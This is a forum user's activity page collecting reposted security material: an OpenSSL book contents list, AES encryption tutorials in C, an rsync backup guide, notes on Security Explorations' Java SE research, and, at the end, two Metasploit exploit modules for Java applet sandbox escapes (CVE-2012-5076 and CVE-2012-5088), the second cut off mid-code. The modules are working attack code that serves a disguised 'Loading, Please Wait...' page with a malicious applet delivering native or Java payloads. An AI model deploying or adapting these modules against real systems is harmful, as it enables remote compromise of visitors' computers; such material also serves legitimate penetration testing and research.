Jump to content

Nytro

Administrators
 View Profile  See their activity

  • Posts

    18725

  • Joined

  • Last visited

  • Days Won

    706

 Content Type 

Everything posted by Nytro

  1. Nytro
    Pentru a preveni eventuale probleme, limitam accesul persoanelor care pot crea un topic pentru vinde/cumpara la numarul de posturi. Asadar, NU se vor aproba topicuri ale membrilor care nu au cel putin 50 de posturi.
  2. Nytro
    Network Security with OpenSSL By Pravir Chandra, Matt Messier, John Viega Publisher : O'Reilly Pub Date : June 2002 ISBN : 0-596-00270-X Pages : 384 OpenSSL is a popular and effective open source version of SSL/TLS, the most widely used protocol for secure network communications. The only guide available on the subject, Network Security with OpenSSLdetails the challenges in securing network communications, and shows you how to use OpenSSL tools to best meet those challenges. Focused on the practical, this book provides only the information that is necessary to use OpenSSL safely and effectively. Table of Content Table of Content......................................................................................................ii Dedication .............................................................................................................vi Preface....................................................................................................................vii About This Book .............................................................................................. viii Conventions Used in This Book........................................................................x Comments and Questions ................................................................................xi Acknowledgments..............................................................................................xi Chapter 1. Introduction...........................................................................................1 1.1 Cryptography for the Rest of Us.................................................................1 1.2 Overview of SSL...........................................................................................8 1.3 Problems with SSL .....................................................................................10 1.4 What SSL Doesn't Do Well .......................................................................16 1.5 OpenSSL Basics.........................................................................................17 1.6 Securing Third-Party Software .................................................................18 Chapter 2. Command-Line Interface..................................................................23 2.1 The Basics ...................................................................................................23 2.2 Message Digest Algorithms ......................................................................25 2.3 Symmetric Ciphers .....................................................................................27 2.4 Public Key Cryptography...........................................................................28 2.5 S/MIME.........................................................................................................32 2.6 Passwords and Passphrases ...................................................................33 2.7 Seeding the Pseudorandom Number Generator...................................35 Chapter 3. Public Key Infrastructure (PKI)........................................................37 3.1 Certificates...................................................................................................37 3.2 Obtaining a Certificate ...............................................................................44 3.3 Setting Up a Certification Authority..........................................................47 Chapter 4. Support Infrastructure.......................................................................60 4.1 Multithread Support....................................................................................60 4.2 Internal Error Handling...............................................................................66 4.3 Abstract Input/Output .................................................................................70 4.4 Random Number Generation ...................................................................80 4.5 Arbitrary Precision Math ............................................................................85 4.6 Using Engines.............................................................................................91 Chapter 5. SSL/TLS Programming.....................................................................93 5.1 Programming with SSL..............................................................................93 5.2 Advanced Programming with SSL.........................................................125 Chapter 6. Symmetric Cryptography................................................................143 6.1 Concepts in Symmetric Cryptography...................................................143 6.2 Encrypting with the EVP API ..................................................................145 6.3 General Recommendations ....................................................................161 Chapter 7. Hashes and MACs ..........................................................................162 7.1 Overview of Hashes and MACs .............................................................162 7.2 Hashing with the EVP API.......................................................................163 7.3 Using MACs...............................................................................................168 7.4 Secure HTTP Cookies.............................................................................179 Chapter 8. Public Key Algorithms.....................................................................184 iii 8.1 When to Use Public Key Cryptography.................................................184 8.2 Diffie-Hellman............................................................................................185 8.2 Diffie-Hellman............................................................................................190 8.3 Digital Signature Algorithm (DSA)..........................................................195 8.4 RSA.............................................................................................................200 8.5 The EVP Public Key Interface ................................................................205 8.6 Encoding and Decoding Objects............................................................213 Chapter 9. OpenSSL in Other Languages ......................................................220 9.1 Net::SSLeay for Perl ................................................................................220 9.2 M2Crypto for Python ................................................................................225 9.3 OpenSSL Support in PHP.......................................................................233 Chapter 10. Advanced Programming Topics..................................................241 10.1 Object Stacks..........................................................................................241 10.2 Configuration Files .................................................................................242 10.3 X.509 ........................................................................................................245 10.4 PKCS#7 and S/MIME............................................................................259 10.5 PKCS#12.................................................................................................268 Appendix A. Command-Line Reference..........................................................270 asn1parse............................................................................................................270 ca ........................................................................................................................271 ciphers ................................................................................................................277 crl .......................................................................................................................277 crl2pkcs7 ............................................................................................................279 dgst.....................................................................................................................280 dhparam..............................................................................................................281 dsa ......................................................................................................................282 dsaparam ............................................................................................................284 enc ......................................................................................................................285 errstr ...................................................................................................................287 gendsa ................................................................................................................287 genrsa .................................................................................................................288 nseq ....................................................................................................................289 passwd................................................................................................................289 pkcs7 ..................................................................................................................290 pkcs8 ..................................................................................................................291 pkcs12 ................................................................................................................293 rand ....................................................................................................................296 req ......................................................................................................................296 rsa.......................................................................................................................301 rsautl...................................................................................................................302 s_client ...............................................................................................................304 s_server ..............................................................................................................306 s_time.................................................................................................................309 sess_id ................................................................................................................311 smime.................................................................................................................312 speed ..................................................................................................................316 spkac ..................................................................................................................316 verify..................................................................................................................317 version................................................................................................................318 x509....................................................................................................................319 iv Colophon ..............................................................................................................326 Download: http://directory.umm.ac.id/Networking%20Manual/Network%20Security%20With%20OpenSSL%202002.pdf
  3. Nytro
    AES CTR Encryption in C Posted on May 7, 2012 by Marty Encryption is one of the best tools at protecting data when it comes to computer security. There are many forms of encryption as well. One of the forms that I encountered recently in my work is AES CTR encryption. I am sure you have heard of AES encryption, but what exactly is AES CTR? AES CTR CTR is a counter mode for AES encryption. It is also known as ICM and SIC. In AES encryption you have what is called an Initializing Vector, or IV for short. This is a 128-bit input that is usually randomized. In CTR mode the IV has two parts. The first 8 bytes is the regular randomized IV. The last 8 bytes is a counter. This counter is a 0 index of the number of 128-bit blocks you are inside the encrypted information. For example. If you are encrypting 512 bits of information (64 bytes), the start position of 0 bytes into the information would have a counter of 0. 16 bytes in, you would have a counter of 1. 32 bytes in your counter would be up to 2. So on an so on until you are at the end if your information. Unlike normal AES encryption this encryption can be seek-able through the information. You don’t have to decrypt all of the bytes to get some information in the middle. The way encryption works in AES CTR mode is that we generate some random bits with the encryption key provided and the IV. With these random bits we then XOR them with our string. This creates a randomized text. To decrypt them we just simply XOR the text with the same exact random bits that we generated with the encryption key and the IV. Let’s look at this example. There is two people, person A and person B. They both share a random string of text that no one else has. Let’s have this random text be 10100011011011011. If person A wants to send person B a message all they have to do is to XOR their message with their random text. Let’s have person A’s message be 10011010101010100. If we XOR the message with the random text we get the following string. 00111001110001111 We then send this string to person B. If person B XORs the string with his random string he will get the original message from person A of 10011010101010100. Encrypting a file and decrypting a file are the same steps. The only differences in our code example would be during decryption we set the IV from the file. During encryption we generate the IV randomly. So everyone wants a code example right? What’s the point of knowing about the method without being able to implement it. For this example we will be using OpenSSL’s AES implementation in their cryptography library. Download the library: Windows For windows you can find the OpenSSL download link here: OpenSSL: OpenSSL Binary Distributions Linux If you’re using a debain based version of linux you can download the library with this command: “sudo apt-get install libssl-dev” OS X. You already have this library installed. It can be found in /usr/include/openss/ and /usr/bin/openssl/ The language that we will be using will be C. The code is not platform specific. We will be writing the code in Linux using a text editor and the GCC compiler. Demo: Encrypt/Decrypt files with OpenSSL AES CTR mode. Note: Code example uses partial code from: c - AES CTR 256 Encryption Mode of operation on OpenSSL - Stack Overflow Let’s start with our includes. We will need to include 4 files for this example. #include <openssl/aes.h> #include <openssl/rand.h> #include <stdio.h> #include <string.h> We will also need a structure to maintain our ivector, ecount, and num. struct ctr_state { unsigned char ivec[AES_BLOCK_SIZE]; unsigned int num; unsigned char ecount[AES_BLOCK_SIZE]; }; The Ivector is the only piece of information used by our program that we care about. Num and ecount are variables that we have to pass into our encryption function that we don’t ever need to care about. *Note AES_BLOCK_SIZE is defined to be the integer value of 16. This is the number of bytes in the 128-bit block for AES. We will also need two file types declared for encrypting and decrypting. FILE *readFile; FILE *writeFile; We will also need to set our encryption key. AES_KEY key; Some other inforation that we will need is to know how many bytes we read/wrote, the data that we read/wrote to the file, the IV that we read from the file, and our state for the encryption of a ctr_state struct. int bytes_read, bytes_written; unsigned char indata[AES_BLOCK_SIZE]; unsigned char outdata[AES_BLOCK_SIZE]; unsigned char iv[AES_BLOCK_SIZE]; struct ctr_state state; It is helpful to have a function which initializes the IV setting all the values to be 0 except the first 8 which will be the random input. int init_ctr(struct ctr_state *state, const unsigned char iv[16]) { /* aes_ctr128_encrypt requires 'num' and 'ecount' set to zero on the * first call. */ state->num = 0; memset(state->ecount, 0, AES_BLOCK_SIZE); /* Initialise counter in 'ivec' to 0 */ memset(state->ivec + 8, 0, 8); /* Copy IV into 'ivec' */ memcpy(state->ivec, iv, 8); } Let’s work on our encryption function. Our function can be described as this void fencrypt(char* read, char* write, const unsigned char* enc_key) { Read is the file name plus location that we are reading from to encrypt. Write is the file name plus location that we are writing the encrypted information to. enc_key is the encryption key used to encrypt the file. *Note, this must be 16 bytes long. This is the “password” to the file. The first thing we need to do is to create an IV with random bytes. OpenSSL library has a function to generate random bytes into an array. It is found in rand.h. if(!RAND_bytes(iv, AES_BLOCK_SIZE)) { fprintf(stderr, "Could not create random bytes."); exit(1); } Now we need to open our reading/writing files and make sure that they can be used. readFile = fopen(read,"rb"); // The b is required in windows. writeFile = fopen(write,"wb"); if(readFile==NULL) { fprintf(stderr, "Read file is null."); exit(1); } if(writeFile==NULL) { fprintf(stderr, "Write file is null."); exit(1); } Now that we have our file in place we need to write out our IV to the file. The IV is not suppose to be secure. Remember that only the first 8 bytes of the IV are even used in this mode of AES encryption. fwrite(iv, 1, 8, writeFile); // IV bytes 1 - 8 fwrite("", 1, 8, writeFile); // Fill the last 8 with null bytes 9 - 16 The next step is to set our encryption key. //Initializing the encryption KEY if (AES_set_encrypt_key(enc_key, 128, &key) < 0) { fprintf(stderr, "Could not set encryption key."); exit(1); } After we set our encryption key we need to initialize our state structure which holds our IV. init_ctr(&state, iv); //Counter call Now the fun part. We will go into a continuous loop reading from the file encrypting all the data and writing it out. while(1) { We then need to read 16 bytes from the file into our indata array. bytes_read = fread(indata, 1, AES_BLOCK_SIZE, readFile); After we read the bytes we then encrypt them using our AES_ctr128_encrypt function. This is the 128-bit encryption function found in aes.h. Indata is the data we read from the file. Outdata is our array to which the encrypted bytes will be placed. bytes_read is the number of bytes in the indata array to be encrypted. Key is the encryption key that was set using our 16 byte password. State.ivec is the IV used for encryption. The last two variables are not used by us so we don’t need to know about them at all. AES_ctr128_encrypt(indata, outdata, bytes_read, &key, state.ivec, state.ecount, &state.num); Now that we encrypted our data into outdata it’s time to write them to a file. bytes_written = fwrite(outdata, 1, bytes_read, writeFile); If we read less than our block size it probably means we are at the end of the file. We can stop encrypting now. if (bytes_read < AES_BLOCK_SIZE) { break; } } We now need to close our files to as they are no longer needed. fclose(writeFile); fclose(readFile); } So what changes in the decrypting function? Basically nothing. The only changes that we do is we set our IV to be the first 16 bytes in the input file. The rest of the code is the exact same. If you want a further example the code can be found here: http://www.gurutechnologies.net/uploads/martyj/aes_ctr_example.zip Compile via command line with the following command. “gcc main.c -lm -lcrypto -lssl” Sursa: AES CTR Encryption in C | Guru Technologies
  4. Nytro
    AES encryption/decryption demo program using OpenSSL EVP apis /** AES encryption/decryption demo program using OpenSSL EVP apis gcc -Wall openssl_aes.c -lcrypto this is public domain code. Saju Pillai (saju.pillai@gmail.com) **/ #include <string.h> #include <stdio.h> #include <stdlib.h> #include <openssl/evp.h> /** * Create an 256 bit key and IV using the supplied key_data. salt can be added for taste. * Fills in the encryption and decryption ctx objects and returns 0 on success **/ int aes_init(unsigned char *key_data, int key_data_len, unsigned char *salt, EVP_CIPHER_CTX *e_ctx, EVP_CIPHER_CTX *d_ctx) { int i, nrounds = 5; unsigned char key[32], iv[32]; /* * Gen key & IV for AES 256 CBC mode. A SHA1 digest is used to hash the supplied key material. * nrounds is the number of times the we hash the material. More rounds are more secure but * slower. */ i = EVP_BytesToKey(EVP_aes_256_cbc(), EVP_sha1(), salt, key_data, key_data_len, nrounds, key, iv); if (i != 32) { printf("Key size is %d bits - should be 256 bits\n", i); return -1; } EVP_CIPHER_CTX_init(e_ctx); EVP_EncryptInit_ex(e_ctx, EVP_aes_256_cbc(), NULL, key, iv); EVP_CIPHER_CTX_init(d_ctx); EVP_DecryptInit_ex(d_ctx, EVP_aes_256_cbc(), NULL, key, iv); return 0; } /* * Encrypt *len bytes of data * All data going in & out is considered binary (unsigned char[]) */ unsigned char *aes_encrypt(EVP_CIPHER_CTX *e, unsigned char *plaintext, int *len) { /* max ciphertext len for a n bytes of plaintext is n + AES_BLOCK_SIZE -1 bytes */ int c_len = *len + AES_BLOCK_SIZE, f_len = 0; unsigned char *ciphertext = malloc(c_len); /* allows reusing of 'e' for multiple encryption cycles */ EVP_EncryptInit_ex(e, NULL, NULL, NULL, NULL); /* update ciphertext, c_len is filled with the length of ciphertext generated, *len is the size of plaintext in bytes */ EVP_EncryptUpdate(e, ciphertext, &c_len, plaintext, *len); /* update ciphertext with the final remaining bytes */ EVP_EncryptFinal_ex(e, ciphertext+c_len, &f_len); *len = c_len + f_len; return ciphertext; } /* * Decrypt *len bytes of ciphertext */ unsigned char *aes_decrypt(EVP_CIPHER_CTX *e, unsigned char *ciphertext, int *len) { /* because we have padding ON, we must allocate an extra cipher block size of memory */ int p_len = *len, f_len = 0; unsigned char *plaintext = malloc(p_len + AES_BLOCK_SIZE); EVP_DecryptInit_ex(e, NULL, NULL, NULL, NULL); EVP_DecryptUpdate(e, plaintext, &p_len, ciphertext, *len); EVP_DecryptFinal_ex(e, plaintext+p_len, &f_len); *len = p_len + f_len; return plaintext; } int main(int argc, char **argv) { /* "opaque" encryption, decryption ctx structures that libcrypto uses to record status of enc/dec operations */ EVP_CIPHER_CTX en, de; /* 8 bytes to salt the key_data during key generation. This is an example of compiled in salt. We just read the bit pattern created by these two 4 byte integers on the stack as 64 bits of contigous salt material - ofcourse this only works if sizeof(int) >= 4 */ unsigned int salt[] = {12345, 54321}; unsigned char *key_data; int key_data_len, i; char *input[] = {"a", "abcd", "this is a test", "this is a bigger test", "\nWho are you ?\nI am the 'Doctor'.\n'Doctor' who ?\nPrecisely!", NULL}; /* the key_data is read from the argument list */ key_data = (unsigned char *)argv[1]; key_data_len = strlen(argv[1]); /* gen key and iv. init the cipher ctx object */ if (aes_init(key_data, key_data_len, (unsigned char *)&salt, &en, &de)) { printf("Couldn't initialize AES cipher\n"); return -1; } /* encrypt and decrypt each input string and compare with the original */ for (i = 0; input[i]; i++) { char *plaintext; unsigned char *ciphertext; int olen, len; /* The enc/dec functions deal with binary data and not C strings. strlen() will return length of the string without counting the '\0' string marker. We always pass in the marker byte to the encrypt/decrypt functions so that after decryption we end up with a legal C string */ olen = len = strlen(input[i])+1; ciphertext = aes_encrypt(&en, (unsigned char *)input[i], &len); plaintext = (char *)aes_decrypt(&de, ciphertext, &len); if (strncmp(plaintext, input[i], olen)) printf("FAIL: enc/dec failed for \"%s\"\n", input[i]); else printf("OK: enc/dec ok for \"%s\"\n", plaintext); free(ciphertext); free(plaintext); } EVP_CIPHER_CTX_cleanup(&en); EVP_CIPHER_CTX_cleanup(&de); return 0; } Sursa: http://saju.net.in/code/misc/openssl_aes.c.txt
  5. Nytro
    Rsync guide & tutorial Updated: January 21, 2013 Well, you have probably read a million guides on how to backup your personal data using rsync, a highly useful and versatile data copying tool. Here's another one. I would like to show you some basic tips and tricks for smart and safe rsync usage, how to make a flexible and useful setup, and how to automate your backup procedure, as a part of a comprehensive backup strategy, which you must have. In home setups, rsync might be somewhat of an overkill. and many users might actually prefer to run the tool with some kind of a frontend, like grsync. However, if you want to fully master and control your data sync and transfer, then, at some point, you will examine the usage from the command line. This guide should get you underway. Quick, quick introduction You can all read man pages, I am sure. In this particular case, rsync is very well documented, and you should be able to get going with just that, in theory. However, before you begin and potentially cause irreversible damage to your data, you should take several necessary precautions. Dry run Normally, we should begin with basic usage, but that comes next. It is so important to emphasize the below section that I am going to skip the actual syntax for now. Not the serial flow you would expect, but it's a must. So here it goes. You should never run rsync without using the --dry-run option first. This will give a detailed list of what would have happened had you run for real. You can combine the output with the --incremental option to get the list of all changes. Finally, use the --log-file=FILE option to write all changes to a report. You should start testing with a dummy source and destination directory. You should make sure that you do not overwrite existing data or that you can afford to lose the pieces of your information if the commands go wrong. Only after you have completed several safe runs and verified no undesired files are copied, desired files are deleted, nothing is missing, and nothing has been modified without your consent, only then should you try copying files in earnest. Basic usage Now we can use rsync. The commands are as follows: rsync FLAGS/OPTIONS SRC DEST It's as simple as that. The common recommended options you want are: -avs - All objects, verbose output, do not allow remote shell to interpret characters; in other words, file names with spaces and special characters will not be translated, which is what you want most likely, especially if you have Windows files, too. --delete will delete files at the target (destination), if they do not exist in the source. This means you will always keep an up to date list of files and the source and destination will match, plus the destination will not slowly grow in size with older, perhaps irrelevant content. Advanced options There are a million, literally. So here's a sampling of good things: -l (lowercase L), when symlinks are encountered, recreate the symlink on the destination. --exclude=PATTERN exclude files matching PATTERN --exclude-from=FILE, read exclude patterns from FILE --include=PATTERN, don't exclude files matching PATTERN --include-from=FILE, read include patterns from FILE Likewise, the option --files-from=FILE allows you to specify a detailed list of directories you wish to include in your backup. Please note that if you write down directory paths without trailing slash, they will be recreated blank, and if you do add the trailing slash, their content will also be copied. And we mentioned the log file earlier, here's a sample: Another useful option is -h, which prints the rsync copy summary in a human-readable format. You don't care about blocks, you care about MB and suchlike: For FAT filesystems Quoting from the man pages, when comparing two timestamps, rsync treats the timestamps as being equal if they differ by no more than the modify-window value. This is normally 0 for an exact match, but you may find it useful to set this to a larger value in some situations. In particular, when transferring to or from a Microsoft Windows FAT filesystem, which represents times with a two-second resolution, --modify-window=1 is useful. Test your commands And then you ought to run and verify it all works dandily: Here's a another, sample text output of an rsync run, no simulation this time, it's happening - the output shows human readable summary, we use the incremental list, we delete files at the destination that do not match the source, and you can see three files being deleted. In fact, I have only renamed two files, replacing the word fun to guide in their names, but you can see the effect being two deletions, two copies, plus one file being removed altogether. rsync -avs --delete -i -h /home/gamer/Pictures /mnt/home/tester/rsync-fun --log-file=/home/gamer/rsync.log sending incremental file list .d..t...... Pictures/ *deleting Pictures/rsync-guide-man-page.png *deleting Pictures/rsync-fun-summary.png *deleting Pictures/rsync-fun-dry-run.png >f+++++++++ Pictures/rsync-guide-dry-run.png >f+++++++++ Pictures/rsync-guide-summary.png sent 180.65K bytes received 67 bytes 361.43K bytes/sec total size is 579.49M speedup is 3206.62 And we check the destination too. You should use the combination of directory and file count and total usage, with commands like du, wc and similar to make sure that you have the exact same information on your target filesystem as the source. Scheduling If you are satisfied with the result, you can now script and schedule the command. The first step is to create a simple shell script that contains the earliest rsync command. Then, you should chmod it to be executable and run it once or twice to verify there are no weird bugs or errors.Your typical script might look something like: #!/bin/bash echo some useful information perhaps your rsync command here preferably with good logging exit 0 Next, you need to cron your task. But that's a topic for another tutorial. If you need instructions for that, there'll be a followup to this guide. Still, it might look something like the line below - this cron will run every hour: * */1 * * * /home/roger/rsync-backup.sh Alternatives If you must have a GUI, then maybe Grsync is what you want: Conclusion There you go, a nice, quick and useful guide. Hopefully, it will help you get past your fear of using the command line and utilizing the awesome little tool called rsync to create backups of your data, which is what we strive for. The tutorial covers the necessary precautions, like dry-run, list and details log, checking everything carefully before firing potentially destructive commands, basic and advanced usage, input and output formats that should help you manage your backup data, some Windows tips, a word or two on scheduling, as well as a frontend alternative, if you still fear the command line. All in all, there's a plenty going on here. I hope you like it. Well, that would be all. The warning sign image is in public domain. Cheers. Sursa: Rsync guide & tutorial
  6. Nytro
    Security vulnerabilities in Java SE, PoC codes /*## (c) SECURITY EXPLORATIONS 2012 poland #*/ /*## http://www.security-explorations.com #*/ /* RESEARCH MATERIAL: SE-2012-01 */ /* [Security vulnerabilities in Java SE, PoC codes] */ This package contains Proof of Concept codes illustrating security weaknesses discovered during SE-2012-01 security research project. Impact characteristics of the included codes is presented below: - PoC for Issue 1 complete Java security sandbox bypass - PoC for Issue 2 complete Java security sandbox bypass - PoC for Issue 3 complete Java security sandbox bypass - PoC for Issue 4 complete Java security sandbox bypass - PoC for Issue 5 complete Java security sandbox bypass - PoC for Issue 6 complete Java security sandbox bypass - PoC for Issue 7 complete Java security sandbox bypass - PoC for Issues 8 and 16 complete Java security sandbox bypass - PoC for Issues 11 and 19 complete Java security sandbox bypass - PoC for Issues 12 and 13 complete Java security sandbox bypass - PoC for Issue 14 JVM properties access - PoC for Issue 15 newInstance of arbitrary class in a doPrivileged block - PoC for Issues 20 and 21 complete Java security sandbox bypass - PoC for Issue 20 complete Java security sandbox bypass - PoC for Issues 15 and 22 complete Java security sandbox bypass - PoC for Issues 8 and 23 JVM properties access, file read access - PoC for Issue 26 complete Java security sandbox bypass - PoC for Issue 30 JVM properties access - PoC for Issue 31 newInstance of arbitrary class in a doPrivileged block - PoC for Issues 1 and 32 complete Java security sandbox bypass - PoC for Issue 32 complete Java security sandbox bypass - PoC for Issue 33 complete Java security sandbox bypass - PoC for Issue 34 complete Java security sandbox bypass - PoC for Issue 35 complete Java security sandbox bypass - PoC for Issue 36 complete Java security sandbox bypass - PoC for Issue 37 complete Java security sandbox bypass - PoC for Issues 38 and 39 complete Java security sandbox bypass - PoC for Issues 40, 41 and 42 complete Java security sandbox bypass - PoC for Issues 43, 44 and 45 complete Java security sandbox bypass - PoC for Issues 46, 47 and 48 complete Java security sandbox bypass - PoC for Issue 49 complete Java security sandbox bypass It is the best to start the analysis / tests of Oracle codes with the following versions of Java SE: JRE/JDK 7 (version 1.7.0-b147) JRE/JDK 7u1 (version 1.7.0_01-b08) JRE/JDK 7u2 (version 1.7.0_02-b13) JRE/JDK 7u3 (version 1.7.0_03-b05) JRE/JDK 7u4 (version 1.7.0_04-ea-b18, early access release from 29 Mar 2012) These are the versions that were vulnerable to all of security issues originally reported to the company in Apr 2012. Consecutive releases of Oracle's Java SE software from Jun, Aug and Oct 2012 addressed most of the issues (29 out of 31 as of Nov 17, 2012). Download: http://www.security-explorations.com/materials/se-2012-01-codes.zip Alte documente: http://www.security-explorations.com/materials/
  7. Nytro
    Security Vulnerabilities in Java SE Technical Report Ver. 1.0.2 SE-2012-01 Project INTRODUCTION Java has been within our interest for nearly a decade. We've been breaking it with successes since 2002 and are truly passionate about it. Regardless of the many changes that had occurred in the Rich Internet Application's1 space, Java is still present in the vast number of desktop computers. According to some published data2, Java is installed on 1.1 billion desktops and there are 930 million Java Runtime Environment downloads each year. These numbers speak for themselves and it's actually hard to ignore Java when it comes to the security of PC computers these days. Java is also one of the most exciting and difficult to break technologies we have ever met with. Contrary to the common belief, it is not so easy to break Java. For a reliable, non memory corruption based exploit codes, usually more than one issue needs to be combined together to achieve a full JVM sandbox compromise. This alone is both challenging and demanding as it usually requires a deep knowledge of a Java VM implementation and the tricks that can be used to break its security. The primary goal of this paper is to present the results of a security research project (codenamed SE-2012-013) that aimed to verify the state of Java SE security in 2012. Although, it includes information about new vulnerabilities and exploitation techniques, it relies on the results obtained and reported to the vendor4 back in 2005. The techniques and exploitation scenarios discovered seven years ago are still valid for Java. What’s even more surprising is that multiple new instances of certain type of vulnerabilities could be found in the latest 7th incarnation of Java SE software. The other goal of this paper is to educate users, developers and possibly vendors about security risks associated with certain Java APIs. We also want to show the tricky nature of Java security. In the first part of this paper, quick introduction to Java VM security architecture and model will be made. It will be followed by a brief description of Reflection API, its implementation and shortcomings being the result of certain design / implementation choices. We will discuss in a detail the possibilities for abuse Reflection API creates. The second part of the paper will present exploitation techniques and vulnerabilities found during SE-2012-01 project. We will show how single and quite innocent looking Java security breaches can lead to serious, full-blown compromises of a Java security sandbox. Technical details of sample (most interesting) vulnerabilities that were found during SE-2012-01 research project will be also presented. The paper will wrap up with a few summary words regarding security of Java technology and its future. Download: http://www.security-explorations.com/materials/se-2012-01-report.pdf
  8. Nytro
    Java Applet AverageRangeStatisticImpl Remote Code Execution Authored by juan vazquez, temp66 | Site metasploit.com This Metasploit module abuses the AverageRangeStatisticImpl from a Java Applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier. advisories | CVE-2012-5076, OSVDB-86363 ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet AverageRangeStatisticImpl Remote Code Execution', 'Description' => %q{ This module abuses the AverageRangeStatisticImpl from a Java Applet to run arbitrary Java code outside of the sandbox, a different exploit vector than the one exploited in the wild in November of 2012. The vulnerability affects Java version 7u7 and earlier. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery at security-explorations 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2012-5076' ], [ 'OSVDB', '86363' ], [ 'BID', '56054' ], [ 'URL', 'http://www.oracle.com/technetwork/topics/security/javacpuoct2012-1515924.html' ], [ 'URL', 'https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2012-5076' ], [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 16 2012' )) end def setup path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "Exploit.class") @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5076_2", "B.class") @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } @exploit_class_name = rand_text_alpha("Exploit".length) @exploit_class.gsub!("Exploit", @exploit_class_name) super end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jar$/i jar = payload.encoded_jar jar.add_file("#{@exploit_class_name}.class", @exploit_class) jar.add_file("B.class", @loader_class) metasploit_str = rand_text_alpha("metasploit".length) payload_str = rand_text_alpha("payload".length) jar.entries.each { |entry| entry.name.gsub!("metasploit", metasploit_str) entry.name.gsub!("Payload", payload_str) entry.data = entry.data.gsub("metasploit", metasploit_str) entry.data = entry.data.gsub("Payload", payload_str) } jar.build_manifest send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) when /\/$/ payload = regenerate_payload(cli) if not payload print_error("Failed to generate the payload.") send_not_found(cli) return end send_response_html(cli, generate_html, { 'Content-Type' => 'text/html' }) else send_redirect(cli, get_resource() + '/', '') end end def generate_html html = %Q|<html><head><title>Loading, Please Wait...</title></head>| html += %Q|<body><center><p>Loading, Please Wait...</p></center>| html += %Q|<applet archive="#{rand_text_alpha(8)}.jar" code="#{@exploit_class_name}.class" width="1" height="1">| html += %Q|</applet></body></html>| return html end end Sursa: Java Applet AverageRangeStatisticImpl Remote Code Execution ? Packet Storm
  9. Nytro
    Java Applet Method Handle Remote Code Execution Authored by juan vazquez, temp66 | Site metasploit.com This Metasploit module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier. advisories | CVE-2012-5088 ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpServer::HTML include Msf::Exploit::EXE include Msf::Exploit::Remote::BrowserAutopwn autopwn_info({ :javascript => false }) def initialize( info = {} ) super( update_info( info, 'Name' => 'Java Applet Method Handle Remote Code Execution', 'Description' => %q{ This module abuses the Method Handle class from a Java Applet to run arbitrary Java code outside of the sandbox. The vulnerability affects Java version 7u7 and earlier. }, 'License' => MSF_LICENSE, 'Author' => [ 'Unknown', # Vulnerability discovery at security-explorations.com 'juan vazquez' # Metasploit module ], 'References' => [ [ 'CVE', '2012-5088' ], [ 'URL', '86352' ], [ 'BID', '56057' ], [ 'URL', 'http://www.security-explorations.com/materials/SE-2012-01-ORACLE-5.pdf' ], [ 'URL', 'http://www.security-explorations.com/materials/se-2012-01-report.pdf' ] ], 'Platform' => [ 'java', 'win', 'osx', 'linux' ], 'Payload' => { 'Space' => 20480, 'DisableNops' => true }, 'Targets' => [ [ 'Generic (Java Payload)', { 'Platform' => ['java'], 'Arch' => ARCH_JAVA, } ], [ 'Windows x86 (Native Payload)', { 'Platform' => 'win', 'Arch' => ARCH_X86, } ], [ 'Mac OS X x86 (Native Payload)', { 'Platform' => 'osx', 'Arch' => ARCH_X86, } ], [ 'Linux x86 (Native Payload)', { 'Platform' => 'linux', 'Arch' => ARCH_X86, } ], ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Oct 16 2012' )) end def setup path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "Exploit.class") @exploit_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2012-5088", "B.class") @loader_class = File.open(path, "rb") {|fd| fd.read(fd.stat.size) } @exploit_class_name = rand_text_alpha("Exploit".length) @exploit_class.gsub!("Exploit", @exploit_class_name) super end def on_request_uri(cli, request) print_status("handling request for #{request.uri}") case request.uri when /\.jar$/i jar = payload.encoded_jar jar.add_file("#{@exploit_class_name}.class", @exploit_class) jar.add_file("B.class", @loader_class) metasploit_str = rand_text_alpha("metasploit".length) payload_str = rand_text_alpha("payload".length) jar.entries.each { |entry| entry.name.gsub!("metasploit", metasploit_str) entry.name.gsub!("Payload", payload_str) entry.data = entry.data.gsub("metasploit", metasploit_str) entry.data = entry.data.gsub("Payload", payload_str) } jar.build_manifest send_response(cli, jar, { 'Content-Type' => "application/octet-stream" }) when /\/$/ payload = regenerate_payload(cli) if not payload print_error("Failed to generate the payload.") 